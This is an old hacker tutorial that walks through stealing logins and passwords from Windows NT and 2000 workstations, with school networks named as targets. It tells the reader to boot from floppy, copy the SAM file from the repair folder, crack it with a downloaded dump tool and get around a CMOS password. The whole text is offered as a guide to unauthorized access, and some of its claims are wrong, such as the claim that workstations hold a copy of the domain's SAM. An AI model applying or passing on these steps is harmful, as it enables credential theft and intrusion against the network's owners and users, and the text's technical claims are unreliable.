Now... All of us knows that a lot of Networks today uses NT as their choice of OS. Expecially in schools. Though some may use Novell that is not much of a problem coz I will show you how to hack into Novell's network on the other Tutorial.

I have tired this on Windows NT 4.0 and Windows 2000 Professional (which is also Windows NT 5.0)
Im not sure if this will work with Windows NT 2000 Advance Server and Data Center, but they should be thesame since they are both made from NT Technology.

Now, a network has a Server also called as the PDC (Primary Domain Controller). The PDC does the authentication of Login Names and Passwords. The PDC does that thru a file called SAM. SAM is a file that holds Login Names and Passwords.

What the server does is that it creates a SAM file which is created by the Admin, then sends a copy to the BDC (Backup Domain Controler) if there is... and a copy to the Workstation so the users can login locally to the workstation.

This also means that the workstation has a SAM file in it that is the exact copy of the SAM in the server... So our objective will be retrieving that SAM file.

If you look at C:\Winnt\repair\ folder or direcotory, you will find the SAM file there. But wait, you cant open it or copy it to a disk. Why? Because the OS is using it. When you login to the workstation, the OS(Operating System, which in this case is Windows NT) uses both SAM files from
the server and workstation to make sure that your login name and password is real.

So how can we get the SAM file?

Easy, we just have to copy it OUTSIDE windows. Which means you need to create the boot disk and make sure that the workstation boots from a floppy.

Where can I get the Boot Disk?

Go to www.bootdisk.com and download it there. The Boot Disk will use 3 floppy disk since it is huge.


So then the boot disk is created. Now put your Boot Disk #1 and restart the computer. Then you will see it booting up by itself. Then its gonna ask you for Disk 2, then finally Disk 3.

When you find your way to A: prompt, go to the "repari" directory/folder that i just showed you where you can see the SAM file and copy it to your floopy...

Now you have the SAM file!!! But.. what do I use to open it? The SAM file, for security purposes, is encrypted. So you hafta download a crack or a DUMP for it.

Go to http://l0pht.com and download SAM DUMP.

When you are done with the downloading, use the DUMP and BINGO! Login names and passwords Galore!


But what if the computer doesnt boot from floppy?

Simple, go to CMOS setup and set the computer to boot first from floppy then the HDD.

But what if the CMOS Setup is password protected. Simple, go to Astalavista.box.sk and search for CmosPwd By Christophe GRENIER. And read the instructions on how to Kill the CMOS Setup Password.

And that concludes our tutorial for WinNT.

Source:
Hackers Inc & BSRF